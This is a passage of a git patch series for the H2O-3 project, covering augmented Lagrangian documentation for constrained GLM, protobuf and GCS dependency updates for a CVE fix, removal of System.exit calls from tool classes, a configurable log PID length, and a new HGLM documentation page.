+c. When :math:`g_i(x) \leq 0`, the constraint is satisfied and can therefore be ignored and declared inactive;
+d. The inequality constraints are violated only when :math:`g_i(x) - s_i^2 \geq 0`. This is because it implies that :math:`g_i(x) \geq s_i^2 \geq 0`, which is not allowed. Therefore, :math:`geq(x)` only includes the :math:`g_i(x)` where :math:`g_i(x) \geq 0`;
+e. Therefore, you have :math:`h_a(x) = \begin{bmatrix} h(x) \\ geq(x) \\\end{bmatrix}`, where :math:`h(x)` is the original equality constraint and :math:`geq(x)` contains the inequality constraints that satisfied the condition :math:`g_i(x) \geq 0`;
+f. The optimization problem in *equation 1* can now be rewritten as (see the worked illustration after this list):
+
+.. math::
+
+   \min_{X\in R^n} f(x), \text{ subject to } h_a(x) = 0 \quad \text{ equation 4}
+
+g. The augmented Lagrangian function you will solve from *equation 4* becomes:
+
+.. math::
+
+   L_c(x, \lambda) = f(x) + \lambda^T h_a(x) + \frac{c}{2} \|h_a(x)\|^2 \quad \text{ equation 5}
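+
+As a small worked illustration (our own example, not from the reference), suppose there is a single inequality constraint :math:`g_1(x) = x_1 + x_2 - 5 \leq 0` and no equality constraints. At an iterate where :math:`g_1(x) \geq 0`, you have :math:`h_a(x) = \begin{bmatrix} g_1(x) \end{bmatrix}`, so the function minimized at that iteration is
+
+.. math::
+
+   L_c(x, \lambda) = f(x) + \lambda_1 (x_1 + x_2 - 5) + \frac{c}{2} (x_1 + x_2 - 5)^2
+
+with :math:`\lambda_1` updated and :math:`c` increased between iterations.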
+
 Modifying or Creating a Custom GLM Model
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
@@ -2006,3 +2221,7 @@ Technometrics 19.4 (1977): 415-428.
 `Ronnegard, Lars. HGLM course at the Roslin Institute, http://users.du.se/~lrn/DUweb/Roslin/RoslinCourse_hglmAlgorithm_Nov13.pdf. `__
 
 `Balzer, Laura B, and van der Laan, Mark J. "Estimating Effects on Rare Outcomes: Knowledge is Power." U.C. Berkeley Division of Biostatistics Working Paper Series (2013) `__.
+
+.. 
_ref8: + +Michel Bierlaire, Optimization: Principles and Algorithms, Chapter 19, EPEL Press, second edition, 2018 From eaccd47e0535c8b40f94b7d0459f1c74069aa8ff Mon Sep 17 00:00:00 2001 From: Adam Valenta Date: Mon, 21 Oct 2024 18:33:35 +0200 Subject: [PATCH 05/12] GH-16423 upgrade protobuf , google-cloud-storage, and fix CVE-2024-7254 (#16426) * upgrade google-cloud-storage to newest * upgarde protobuf and exclude the one from hadoop-common --- h2o-assemblies/main/build.gradle | 3 ++- h2o-persist-gcs/build.gradle | 2 +- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/h2o-assemblies/main/build.gradle b/h2o-assemblies/main/build.gradle index e2c718abcef4..25bc231de6a4 100644 --- a/h2o-assemblies/main/build.gradle +++ b/h2o-assemblies/main/build.gradle @@ -33,6 +33,7 @@ dependencies { exclude group: "org.apache.curator" exclude group: "org.apache.zookeeper" exclude group: "org.eclipse.jetty" + exclude group: "org.apache.hadoop.thirdparty", module: "hadoop-shaded-protobuf_3_7" } // Upgrade dependencies of h2o-jetty-9 @@ -52,7 +53,7 @@ dependencies { // Upgrade dependencies coming from Hadoop to address vulnerabilities api "org.apache.commons:commons-compress:1.26.0" - api "com.google.protobuf:protobuf-java:3.21.7" + api "com.google.protobuf:protobuf-java:3.25.5" constraints { api('com.fasterxml.jackson.core:jackson-databind:2.17.2') { diff --git a/h2o-persist-gcs/build.gradle b/h2o-persist-gcs/build.gradle index 5d1ba374ad2b..507ef11e51bf 100644 --- a/h2o-persist-gcs/build.gradle +++ b/h2o-persist-gcs/build.gradle @@ -4,7 +4,7 @@ description = "H2O Persist GCS" dependencies { api project(":h2o-core") - api 'com.google.cloud:google-cloud-storage:2.13.1' + api ('com.google.cloud:google-cloud-storage:2.43.2') testImplementation project(":h2o-test-support") testRuntimeOnly project(":${defaultWebserverModule}") From d0899f8e0f7a584b60405a65b1d7b439aaaa55a5 Mon Sep 17 00:00:00 2001 From: krasinski <8573352+krasinski@users.noreply.github.com> Date: Wed, 23 Oct 2024 17:36:04 +0200 Subject: [PATCH 06/12] [GH-16351] Do not call System.exit from water.tools [nocheck] (#16366) * [GH-16351] Do not call System.exit from water.tools * add mainInternal to EncryptionTool * make the err msg short * make the err msg short - part 2 * improve error handling --- .../java/water/tools/MojoConvertTool.java | 25 +++++++++++-------- .../rapids/ast/prims/internal/AstRunTool.java | 6 +++-- .../main/java/water/tools/EncryptionTool.java | 3 +++ .../water/tools/XGBoostLibExtractTool.java | 18 ++++++++----- 4 files changed, 33 insertions(+), 19 deletions(-) diff --git a/h2o-algos/src/main/java/water/tools/MojoConvertTool.java b/h2o-algos/src/main/java/water/tools/MojoConvertTool.java index 9abd23123068..eed6537dc743 100644 --- a/h2o-algos/src/main/java/water/tools/MojoConvertTool.java +++ b/h2o-algos/src/main/java/water/tools/MojoConvertTool.java @@ -33,25 +33,28 @@ void convert() throws IOException { Files.write(pojoPath, pojo.getBytes(StandardCharsets.UTF_8)); } - private static void usage() { - System.err.println("java -cp h2o.jar " + MojoConvertTool.class.getName() + " source_mojo.zip target_pojo.java"); - } - public static void main(String[] args) throws IOException { - if (args.length < 2) { - usage(); + try { + mainInternal(args); + } + catch (IllegalArgumentException e) { + System.err.println(e.getMessage()); System.exit(1); } + } + + public static void mainInternal(String[] args) throws IOException { + if (args.length < 2 || args[0] == null || args[1] == null) { + throw new 
IllegalArgumentException("java -cp h2o.jar " + MojoConvertTool.class.getName() + " source_mojo.zip target_pojo.java"); + } File mojoFile = new File(args[0]); - if (!mojoFile.isFile()) { - System.err.println("Specified MOJO file (" + mojoFile.getAbsolutePath() + ") doesn't exist!"); - System.exit(2); + if (!mojoFile.exists() || !mojoFile.isFile()) { + throw new IllegalArgumentException("Specified MOJO file (" + mojoFile.getAbsolutePath() + ") doesn't exist!"); } File pojoFile = new File(args[1]); if (pojoFile.isDirectory() || (pojoFile.getParentFile() != null && !pojoFile.getParentFile().isDirectory())) { - System.err.println("Invalid target POJO file (" + pojoFile.getAbsolutePath() + ")! Please specify a file in an existing directory."); - System.exit(3); + throw new IllegalArgumentException("Invalid target POJO file (" + pojoFile.getAbsolutePath() + ")! Please specify a file in an existing directory."); } System.out.println(); diff --git a/h2o-core/src/main/java/water/rapids/ast/prims/internal/AstRunTool.java b/h2o-core/src/main/java/water/rapids/ast/prims/internal/AstRunTool.java index 3fe4bf179866..533e9ce7f26d 100644 --- a/h2o-core/src/main/java/water/rapids/ast/prims/internal/AstRunTool.java +++ b/h2o-core/src/main/java/water/rapids/ast/prims/internal/AstRunTool.java @@ -33,10 +33,12 @@ public ValStr apply(Env env, Env.StackHelp stk, AstRoot[] asts) { try { // only allow to run approved tools (from our package), not just anything on classpath Class clazz = Class.forName(TOOLS_PACKAGE + toolClassName); - Method mainMethod = clazz.getDeclaredMethod("main", String[].class); + Method mainMethod = clazz.getDeclaredMethod("mainInternal", String[].class); mainMethod.invoke(null, new Object[]{args}); } catch (Exception e) { - throw new RuntimeException(e); + RuntimeException shorterException = new RuntimeException(e.getCause().getMessage()); + shorterException.setStackTrace(new StackTraceElement[0]); + throw shorterException; } return new ValStr("OK"); } diff --git a/h2o-core/src/main/java/water/tools/EncryptionTool.java b/h2o-core/src/main/java/water/tools/EncryptionTool.java index e3faabf7d12e..73f12f0c9a96 100644 --- a/h2o-core/src/main/java/water/tools/EncryptionTool.java +++ b/h2o-core/src/main/java/water/tools/EncryptionTool.java @@ -47,6 +47,9 @@ public void encrypt(File input, File output) throws IOException, GeneralSecurity } public static void main(String[] args) throws GeneralSecurityException, IOException { + mainInternal(args); + } + public static void mainInternal(String[] args) throws GeneralSecurityException, IOException { EncryptionTool et = new EncryptionTool(); et._keystore_file = new File(args[0]); et._keystore_type = args[1]; diff --git a/h2o-extensions/xgboost/src/main/java/water/tools/XGBoostLibExtractTool.java b/h2o-extensions/xgboost/src/main/java/water/tools/XGBoostLibExtractTool.java index dc94b1835e01..267fd281bee9 100644 --- a/h2o-extensions/xgboost/src/main/java/water/tools/XGBoostLibExtractTool.java +++ b/h2o-extensions/xgboost/src/main/java/water/tools/XGBoostLibExtractTool.java @@ -10,19 +10,25 @@ public class XGBoostLibExtractTool { public static void main(String[] args) throws IOException { + try { + mainInternal(args); + } catch (IllegalArgumentException e) { + System.err.println((e.getMessage())); + System.exit(1); + } + } + + public static void mainInternal(String[] args) throws IOException { if (args.length != 1) { - System.err.println("XGBoostLibExtractTool: Specify target directory where to extract XGBoost native libraries."); - System.exit(-1); + 
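// Validation errors are thrown rather than calling System.exit(), so AstRunTool (which invokes mainInternal reflectively) can surface the message without terminating the JVM.
+            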
throw new IllegalArgumentException("XGBoostLibExtractTool: Specify target directory where to extract XGBoost native libraries."); } File dir = new File(args[0]); if (!dir.exists()) { - System.err.println("XGBoostLibExtractTool: Directory '" + dir.getAbsolutePath() + "' doesn't exist."); - System.exit(-1); + throw new IllegalArgumentException("XGBoostLibExtractTool: Directory '" + dir.getAbsolutePath() + "' doesn't exist."); } NativeLibraryLoaderChain loader = XGBoostExtension.getLoader(); if (loader == null) { - System.err.println("XGBoostLibExtractTool: Failed to locate native libraries."); - System.exit(-1); + throw new IllegalArgumentException("XGBoostLibExtractTool: Failed to locate native libraries."); } for (NativeLibrary lib : loader.getNativeLibs()) { if (!lib.isBundled()) From 3e4c39dfacc5f0e7bc0240d3a9cbda845d86c535 Mon Sep 17 00:00:00 2001 From: Adam Valenta Date: Thu, 24 Oct 2024 15:09:44 +0200 Subject: [PATCH 07/12] GH-16423 - fix hadoop jars after gcs upgrade [nocheck] (#16428) * downgrade google gcs * upgrade only protobuf --- h2o-persist-gcs/build.gradle | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/h2o-persist-gcs/build.gradle b/h2o-persist-gcs/build.gradle index 507ef11e51bf..d07448510c39 100644 --- a/h2o-persist-gcs/build.gradle +++ b/h2o-persist-gcs/build.gradle @@ -4,10 +4,18 @@ description = "H2O Persist GCS" dependencies { api project(":h2o-core") - api ('com.google.cloud:google-cloud-storage:2.43.2') + api ('com.google.cloud:google-cloud-storage:2.13.1') testImplementation project(":h2o-test-support") testRuntimeOnly project(":${defaultWebserverModule}") + + constraints { + api('com.google.protobuf:protobuf-java:3.25.5') { + because 'Fixes CVE-2024-7254' + because 'Fixes SNYK-JAVA-COMGOOGLEPROTOBUF-8055227' + because 'Fixes SNYK-JAVA-COMGOOGLEPROTOBUF-8055228' + } + } } apply from: "${rootDir}/gradle/dataCheck.gradle" From 50aa9e06fbcd4bdec2a28c5373e964954994b6e7 Mon Sep 17 00:00:00 2001 From: Adam Valenta Date: Thu, 24 Oct 2024 16:45:36 +0200 Subject: [PATCH 08/12] GH-16423 - do not remove hadoop-shaded-protobuf_3_7 because of the failed tests (#16436) --- h2o-assemblies/main/build.gradle | 1 - 1 file changed, 1 deletion(-) diff --git a/h2o-assemblies/main/build.gradle b/h2o-assemblies/main/build.gradle index 25bc231de6a4..17b240dc7418 100644 --- a/h2o-assemblies/main/build.gradle +++ b/h2o-assemblies/main/build.gradle @@ -33,7 +33,6 @@ dependencies { exclude group: "org.apache.curator" exclude group: "org.apache.zookeeper" exclude group: "org.eclipse.jetty" - exclude group: "org.apache.hadoop.thirdparty", module: "hadoop-shaded-protobuf_3_7" } // Upgrade dependencies of h2o-jetty-9 From 966a1f213f77749c6b2cd2a81144811c22621135 Mon Sep 17 00:00:00 2001 From: Hannah <52463461+hannah-tillman@users.noreply.github.com> Date: Thu, 24 Oct 2024 11:42:21 -0500 Subject: [PATCH 09/12] ht/numpy requirements (#16434) --- h2o-docs/src/product/welcome.rst | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/h2o-docs/src/product/welcome.rst b/h2o-docs/src/product/welcome.rst index 391b0cdbb6bf..2ac9f5221f73 100644 --- a/h2o-docs/src/product/welcome.rst +++ b/h2o-docs/src/product/welcome.rst @@ -29,6 +29,11 @@ At a minimum, we recommend the following for compatibility with H2O: - Python 3.6.x, 3.7.x, 3.8.x, 3.9.x, 3.10.x, 3.11.x - **Browser**: An internet browser is required to use H2O's web UI, Flow. Supported versions include the latest version of Chrome, Firefox, Safari, or Internet Explorer. +- **numpy**: H2O-3 only supports ``numpy<2``. 
To work around having ``numpy2`` installed, run the following command: + + :: + + pip install --force-reinstall 'numpy<2' Java Requirements ~~~~~~~~~~~~~~~~~ From 6aa97cca00b0e37a6b449993eea7cf0e474b57bf Mon Sep 17 00:00:00 2001 From: krasinski <8573352+krasinski@users.noreply.github.com> Date: Fri, 25 Oct 2024 00:32:05 +0200 Subject: [PATCH 10/12] GH-16361 allow longer pids by adding sys.ai.h2o.log.max.pid.length [nocheck] (#16390) * GH-16361 allow longer pids by adding sys.ai.h2o.log.max.pid.length * add comment about sys.ai.h2o.log.max.pid.length --- h2o-core/src/main/java/water/util/Log.java | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/h2o-core/src/main/java/water/util/Log.java b/h2o-core/src/main/java/water/util/Log.java index dc1658f2ec8f..72f8ebf354ba 100644 --- a/h2o-core/src/main/java/water/util/Log.java +++ b/h2o-core/src/main/java/water/util/Log.java @@ -29,8 +29,8 @@ abstract public class Log { public static final byte INFO = 3; public static final byte DEBUG= 4; public static final byte TRACE= 5; - public static final String[] LVLS = { "FATAL", "ERRR", "WARN", "INFO", "DEBUG", "TRACE" }; + private static final String PROP_MAX_PID_LENGTH = H2O.OptArgs.SYSTEM_PROP_PREFIX + "log.max.pid.length"; private static int _level = INFO; private static boolean _quiet = false; @@ -262,7 +262,15 @@ public static String getLogFilePath(String level) { private static String getHostPortPid() { String host = H2O.SELF_ADDRESS.getHostAddress(); - return fixedLength(host + ":" + H2O.API_PORT + " ", 22) + fixedLength(H2O.PID + " ", 6); + return fixedLength(host + ":" + H2O.API_PORT + " ", 22) + fixedLength(H2O.PID + " ", maximumPidLength() + 2); + } + + // set sys.ai.h2o.log.max.pid.length to avoid h2o-3 trimming PID in the logs + private static int maximumPidLength() { + String maxPidPropertyValue = System.getProperty(PROP_MAX_PID_LENGTH); + return maxPidPropertyValue != null + ? 
Integer.parseInt(maxPidPropertyValue) + : 4; } private static synchronized Logger createLog4j() { From dc7bfa726edfad1436ab8a855ec77ba6067cd083 Mon Sep 17 00:00:00 2001 From: Hannah <52463461+hannah-tillman@users.noreply.github.com> Date: Fri, 25 Oct 2024 21:38:41 -0500 Subject: [PATCH 11/12] GH-16413: Adding HGLM solo algorithm page [nocheck] (#16419) * ht/initial hglm * ht/added descriptions, ordered, values * ht/references * ht/pulled old intro; defining hlm to own section * ht/thru pg2 * ht/first thru HLM section * ht/next section * ht/added to available algo-params * ht/next section draft * ht/equation fixes * ht/next section * ht/weekend pause * ht/draft log-likelihood * ht/alternate log-likelihood & updated refs * ht/pulling hglm from algo-params & glm page * ht/end piece - example stand-in - glm family image add-in for shared algo-params * ht/requested updates * ht/removed intro * ht/requested updates * ht/added r examples * ht/requested changes rd.2 * ht/requetsed changed rd.3 --- h2o-docs/src/product/data-science.rst | 1 + .../algo-params/custom_metric_func.rst | 2 +- .../data-science/algo-params/family.rst | 2 +- .../product/data-science/algo-params/hglm.rst | 81 ---- .../algo-params/ignore_const_cols.rst | 2 +- .../algo-params/ignored_columns.rst | 2 +- .../algo-params/max_iterations.rst | 2 +- .../algo-params/max_runtime_secs.rst | 2 +- .../algo-params/missing_values_handling.rst | 2 +- .../data-science/algo-params/model_id.rst | 2 +- .../algo-params/offset_column.rst | 2 +- .../data-science/algo-params/plug_values.rst | 2 +- .../data-science/algo-params/rand_family.rst | 2 +- .../algo-params/random_columns.rst | 4 +- .../algo-params/score_each_iteration.rst | 2 +- .../product/data-science/algo-params/seed.rst | 2 +- .../data-science/algo-params/standardize.rst | 2 +- .../algo-params/training_frame.rst | 2 +- .../algo-params/validation_frame.rst | 2 +- .../algo-params/weights_column.rst | 2 +- .../product/data-science/algo-params/x.rst | 2 +- .../product/data-science/algo-params/y.rst | 2 +- h2o-docs/src/product/data-science/glm.rst | 266 +----------- h2o-docs/src/product/data-science/hglm.rst | 392 ++++++++++++++++++ h2o-docs/src/product/images/HGLM.png | Bin 0 -> 9054 bytes h2o-docs/src/product/parameters.rst | 1 - 26 files changed, 423 insertions(+), 360 deletions(-) delete mode 100644 h2o-docs/src/product/data-science/algo-params/hglm.rst create mode 100644 h2o-docs/src/product/data-science/hglm.rst create mode 100644 h2o-docs/src/product/images/HGLM.png diff --git a/h2o-docs/src/product/data-science.rst b/h2o-docs/src/product/data-science.rst index bf6fef75163f..b7b16ff0403e 100644 --- a/h2o-docs/src/product/data-science.rst +++ b/h2o-docs/src/product/data-science.rst @@ -42,6 +42,7 @@ H2O-3 supports the following supervised algorithms: data-science/model_selection data-science/gam data-science/anova_glm + data-science/hglm data-science/gbm data-science/naive-bayes data-science/rulefit diff --git a/h2o-docs/src/product/data-science/algo-params/custom_metric_func.rst b/h2o-docs/src/product/data-science/algo-params/custom_metric_func.rst index f58bf37805ce..2895d9d27a8d 100644 --- a/h2o-docs/src/product/data-science/algo-params/custom_metric_func.rst +++ b/h2o-docs/src/product/data-science/algo-params/custom_metric_func.rst @@ -3,7 +3,7 @@ ``custom_metric_func`` ---------------------- -- Available in: GBM, GLM, DRF, Deeplearning, Stacked Ensembles, XGBoost +- Available in: GBM, GLM, HGLM, DRF, Deeplearning, Stacked Ensembles, XGBoost - Hyperparameter: no Description diff 
--git a/h2o-docs/src/product/data-science/algo-params/family.rst b/h2o-docs/src/product/data-science/algo-params/family.rst index 29a5b28c60ba..91e6572f52a5 100644 --- a/h2o-docs/src/product/data-science/algo-params/family.rst +++ b/h2o-docs/src/product/data-science/algo-params/family.rst @@ -1,7 +1,7 @@ ``family`` ---------- -- Available in: GLM, GAM +- Available in: GLM, GAM, HGLM - Hyperparameter: no Description diff --git a/h2o-docs/src/product/data-science/algo-params/hglm.rst b/h2o-docs/src/product/data-science/algo-params/hglm.rst deleted file mode 100644 index 24cbf686b56e..000000000000 --- a/h2o-docs/src/product/data-science/algo-params/hglm.rst +++ /dev/null @@ -1,81 +0,0 @@ -``HGLM`` --------- - -- Available in: GLM -- Hyperparameter: no - -Description -~~~~~~~~~~~ - -Generalized Linear Models (GLM) estimate regression models for outcomes following exponential distributions. Hierarchical GLM (HGLM) fits generalized linear models with random effects, where the random effect can come from a conjugate exponential-family distribution (for example, Gaussian). HGLM allows you to specify both fixed and random effects, which allows fitting correlated to random effects as well as random regression models. - -HGLM produces estimates for fixed effects, random effects, variance components and their standard errors. It also produces diagnostics, such as variances and leverages. - -The ``HGLM`` option allows you to build a hierarchical generalized linear model. This option is disabled by default. - -**Note**: This initial release of HGLM supports only Gaussian for ``family`` and ``rand_family``. - -Related Parameters -~~~~~~~~~~~~~~~~~~ - -- `random_columns `__ -- `rand_family `__ - -Example -~~~~~~~ - -.. tabs:: - .. code-tab:: r R - - library(h2o) - h2o.init() - - # Import the semiconductor dataset - h2odata <- h2o.importFile("https://s3.amazonaws.com/h2o-public-test-data/smalldata/glm_test/semiconductor.csv") - - # Set the response, predictor, and random columns - yresp <- "y" - xlist <- c("x1", "x3", "x5", "x6") - z <- c(1) - - # Convert the "Device" column to a factor - h2odata$Device <- h2o.asfactor(h2odata$Device) - - # Train and view the model - m11H2O <- h2o.glm(x = xlist, - y = yresp, - family = "gaussian", - rand_family = c("gaussian"), - rand_link = c("identity"), - training_frame = h2odata, - HGLM = TRUE, - random_columns = z, - calc_like = TRUE) - print(m11H2O) - - .. 
code-tab:: python - - import h2o - from h2o.estimators.glm import H2OGeneralizedLinearEstimator - h2o.init() - - # Import the semiconductor dataset - h2o_data = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/glm_test/semiconductor.csv") - - # Set the response, predictor, and random columns - y = "y" - x = ["x1","x3","x5","x6"] - z = 0 - - # Convert the "Device" column to a factor - h2o_data["Device"] = h2o_data["Device"].asfactor() - - # Train and view the model - h2o_glm = H2OGeneralizedLinearEstimator(HGLM=True, - family="gaussian", - rand_family=["gaussian"], - random_columns=[z], - rand_link=["identity"], - calc_like=True) - h2o_glm.train(x=x, y=y, training_frame=h2o_data) - print(h2o_glm) diff --git a/h2o-docs/src/product/data-science/algo-params/ignore_const_cols.rst b/h2o-docs/src/product/data-science/algo-params/ignore_const_cols.rst index bb1f3865a9a9..118ed290d864 100644 --- a/h2o-docs/src/product/data-science/algo-params/ignore_const_cols.rst +++ b/h2o-docs/src/product/data-science/algo-params/ignore_const_cols.rst @@ -1,7 +1,7 @@ ``ignore_const_cols`` --------------------- -- Available in: GBM, DRF, Deep Learning, GLM, GAM, PCA, GLRM, Naïve-Bayes, K-Means, XGBoost, Aggregator, Isolation Forest, Extended Isolation Forest, Uplift DRF, AdaBoost +- Available in: GBM, DRF, Deep Learning, GLM, GAM, HGLM, PCA, GLRM, Naïve-Bayes, K-Means, XGBoost, Aggregator, Isolation Forest, Extended Isolation Forest, Uplift DRF, AdaBoost, Decision Tree, ANOVAGLM, ModelSelection - Hyperparameter: no Description diff --git a/h2o-docs/src/product/data-science/algo-params/ignored_columns.rst b/h2o-docs/src/product/data-science/algo-params/ignored_columns.rst index 3bdd8ed63e64..7f2ac060544d 100644 --- a/h2o-docs/src/product/data-science/algo-params/ignored_columns.rst +++ b/h2o-docs/src/product/data-science/algo-params/ignored_columns.rst @@ -1,7 +1,7 @@ ``ignored_columns`` ------------------- -- Available in: GBM, DRF, Deep Learning, GLM, GAM, PCA, GLRM, Naïve-Bayes, K-Means, XGBoost, Aggregator, CoxPH, Isolation Forest, Extended Isolation Forest, Uplift DRF, AdaBoost +- Available in: GBM, DRF, Deep Learning, GLM, GAM, HGLM, PCA, GLRM, Naïve-Bayes, K-Means, XGBoost, Aggregator, CoxPH, Isolation Forest, Extended Isolation Forest, Uplift DRF, AdaBoost, Decision Tree, ANOVAGLM, ModelSelection - Hyperparameter: no Description diff --git a/h2o-docs/src/product/data-science/algo-params/max_iterations.rst b/h2o-docs/src/product/data-science/algo-params/max_iterations.rst index 1d15c6240ade..d791368f1798 100644 --- a/h2o-docs/src/product/data-science/algo-params/max_iterations.rst +++ b/h2o-docs/src/product/data-science/algo-params/max_iterations.rst @@ -1,7 +1,7 @@ ``max_iterations`` ------------------ -- Available in: GLM, GAM, PCA, GLRM, K-Means, CoxPH +- Available in: GLM, GAM, HGLM, PCA, GLRM, K-Means, CoxPH, ANOVAGLM, ModelSelection - Hyperparameter: yes Description diff --git a/h2o-docs/src/product/data-science/algo-params/max_runtime_secs.rst b/h2o-docs/src/product/data-science/algo-params/max_runtime_secs.rst index 40803a1e173e..0f7273c0a575 100644 --- a/h2o-docs/src/product/data-science/algo-params/max_runtime_secs.rst +++ b/h2o-docs/src/product/data-science/algo-params/max_runtime_secs.rst @@ -3,7 +3,7 @@ ``max_runtime_secs`` ----------------------- -- Available in: GBM, DRF, Deep Learning, GLM, PCA, GLRM, Naïve-Bayes, K-Means, AutoML, XGBoost, Word2vec, Isolation Forest, Stacked Ensembles, Uplift DRF +- Available in: GBM, DRF, Deep Learning, GLM, HGLM, PCA, GLRM, 
Naïve-Bayes, K-Means, AutoML, XGBoost, Word2vec, Isolation Forest, Stacked Ensembles, Uplift DRF, ANOVAGLM, ModelSelection - Hyperparameter: yes Description diff --git a/h2o-docs/src/product/data-science/algo-params/missing_values_handling.rst b/h2o-docs/src/product/data-science/algo-params/missing_values_handling.rst index 4785d6cad8a8..01cb03a8482a 100644 --- a/h2o-docs/src/product/data-science/algo-params/missing_values_handling.rst +++ b/h2o-docs/src/product/data-science/algo-params/missing_values_handling.rst @@ -1,7 +1,7 @@ ``missing_values_handling`` --------------------------- -- Available in: Deep Learning, GLM, GAM +- Available in: Deep Learning, GLM, GAM, HGLM, ANOVAGLM, ModelSelection - Hyperparameter: yes Description diff --git a/h2o-docs/src/product/data-science/algo-params/model_id.rst b/h2o-docs/src/product/data-science/algo-params/model_id.rst index 222a4188c5b9..f1074afe934a 100644 --- a/h2o-docs/src/product/data-science/algo-params/model_id.rst +++ b/h2o-docs/src/product/data-science/algo-params/model_id.rst @@ -1,7 +1,7 @@ ``model_id`` ------------ -- Available in: GBM, DRF, Deep Learning, GLM, GAM, PCA, GLRM, Naïve-Bayes, K-Means, Word2Vec, Stacked Ensembles, XGBoost, Aggregator, CoxPH, Isolation Forest, Extended Isolation Forest, Uplift DRF, AdaBoost +- Available in: GBM, DRF, Deep Learning, GLM, GAM, HGLM, PCA, GLRM, Naïve-Bayes, K-Means, Word2Vec, Stacked Ensembles, XGBoost, Aggregator, CoxPH, Isolation Forest, Extended Isolation Forest, Uplift DRF, AdaBoost, Decision Tree, ANOVAGLM, ModelSelection - Hyperparameter: no Description diff --git a/h2o-docs/src/product/data-science/algo-params/offset_column.rst b/h2o-docs/src/product/data-science/algo-params/offset_column.rst index 999c763a6694..a7b7bce8c91e 100644 --- a/h2o-docs/src/product/data-science/algo-params/offset_column.rst +++ b/h2o-docs/src/product/data-science/algo-params/offset_column.rst @@ -1,7 +1,7 @@ ``offset_column`` ----------------- -- Available in: GBM, Deep Learning, GLM, GAM, CoxPH, XGBoost, Stacked Ensembles +- Available in: GBM, Deep Learning, GLM, GAM, HGLM, CoxPH, XGBoost, Stacked Ensembles, ANOVAGLM, ModelSelection - Hyperparameter: no diff --git a/h2o-docs/src/product/data-science/algo-params/plug_values.rst b/h2o-docs/src/product/data-science/algo-params/plug_values.rst index 9c60330da220..051df8dc2044 100644 --- a/h2o-docs/src/product/data-science/algo-params/plug_values.rst +++ b/h2o-docs/src/product/data-science/algo-params/plug_values.rst @@ -1,7 +1,7 @@ ``plug_values`` --------------- -- Available in: GLM, GAM +- Available in: GLM, GAM, HGLM, ANOVAGLM, ModelSelection - Hyperparameter: yes Description diff --git a/h2o-docs/src/product/data-science/algo-params/rand_family.rst b/h2o-docs/src/product/data-science/algo-params/rand_family.rst index d02187b3ffa3..93039511d074 100644 --- a/h2o-docs/src/product/data-science/algo-params/rand_family.rst +++ b/h2o-docs/src/product/data-science/algo-params/rand_family.rst @@ -1,7 +1,7 @@ ``rand_family`` --------------- -- Available in: GLM +- Available in: HGLM - Hyperparameter: no Description diff --git a/h2o-docs/src/product/data-science/algo-params/random_columns.rst b/h2o-docs/src/product/data-science/algo-params/random_columns.rst index 7e7c53406ab5..ee2e621e114c 100644 --- a/h2o-docs/src/product/data-science/algo-params/random_columns.rst +++ b/h2o-docs/src/product/data-science/algo-params/random_columns.rst @@ -1,8 +1,8 @@ ``random_columns`` ------------------ -- Available in: GLM -- Hyperparameter: no +- Available in: HGLM +- 
Hyperparameter: yes Description ~~~~~~~~~~~ diff --git a/h2o-docs/src/product/data-science/algo-params/score_each_iteration.rst b/h2o-docs/src/product/data-science/algo-params/score_each_iteration.rst index 9a759131e6aa..5d2426a4a7ac 100644 --- a/h2o-docs/src/product/data-science/algo-params/score_each_iteration.rst +++ b/h2o-docs/src/product/data-science/algo-params/score_each_iteration.rst @@ -3,7 +3,7 @@ ``score_each_iteration`` ------------------------ -- Available in: GBM, DRF, Deep Learning, GLM, GAM, PCA, GLRM, Naïve-Bayes, K-Means, XGBoost, Isolation Forest, Extended Isolation Forest, Uplift DRF +- Available in: GBM, DRF, Deep Learning, GLM, GAM, HGLM, PCA, GLRM, Naïve-Bayes, K-Means, XGBoost, Isolation Forest, Extended Isolation Forest, Uplift DRF, ANOVAGLM, ModelSelection - Hyperparameter: no diff --git a/h2o-docs/src/product/data-science/algo-params/seed.rst b/h2o-docs/src/product/data-science/algo-params/seed.rst index 334db7479a1e..1e5c20ed6afc 100644 --- a/h2o-docs/src/product/data-science/algo-params/seed.rst +++ b/h2o-docs/src/product/data-science/algo-params/seed.rst @@ -1,7 +1,7 @@ ``seed`` -------- -- Available in: GBM, DRF, Deep Learning, GLM, GAM, PCA, GLRM, Naïve-Bayes, K-Means, AutoML, XGBoost, Stacked Ensembles, Isolation Forest, Target Encoding, Extended Isolation Forest, Uplift DRF, AdaBoost +- Available in: GBM, DRF, Deep Learning, GLM, GAM, HGLM, PCA, GLRM, Naïve-Bayes, K-Means, AutoML, XGBoost, Stacked Ensembles, Isolation Forest, Target Encoding, Extended Isolation Forest, Uplift DRF, AdaBoost, Decision Tree, ANOVAGLM, ModelSelection - Hyperparameter: yes Description diff --git a/h2o-docs/src/product/data-science/algo-params/standardize.rst b/h2o-docs/src/product/data-science/algo-params/standardize.rst index 946fbd60c8f7..27bf489429ab 100644 --- a/h2o-docs/src/product/data-science/algo-params/standardize.rst +++ b/h2o-docs/src/product/data-science/algo-params/standardize.rst @@ -1,7 +1,7 @@ ``standardize`` --------------- -- Available in: Deep Learning, GLM, GAM, K-Means +- Available in: Deep Learning, GLM, GAM, HGLM, K-Means, ANOVAGLM, ModelSelection - Hyperparameter: yes Description diff --git a/h2o-docs/src/product/data-science/algo-params/training_frame.rst b/h2o-docs/src/product/data-science/algo-params/training_frame.rst index 76d9dd4ad91b..aa75fc63e10f 100644 --- a/h2o-docs/src/product/data-science/algo-params/training_frame.rst +++ b/h2o-docs/src/product/data-science/algo-params/training_frame.rst @@ -1,7 +1,7 @@ ``training_frame`` ------------------ -- Available in: GBM, DRF, Deep Learning, GLM, GAM, PCA, GLRM, Naïve-Bayes, K-Means, Word2Vec, Stacked Ensembles, AutoML, XGBoost, Aggregator, CoxPH, Isolation Forest, Extended Isolation Forest, Uplift DRF, AdaBoost +- Available in: GBM, DRF, Deep Learning, GLM, GAM, HGLM, PCA, GLRM, Naïve-Bayes, K-Means, Word2Vec, Stacked Ensembles, AutoML, XGBoost, Aggregator, CoxPH, Isolation Forest, Extended Isolation Forest, Uplift DRF, AdaBoost, Decision Tree, 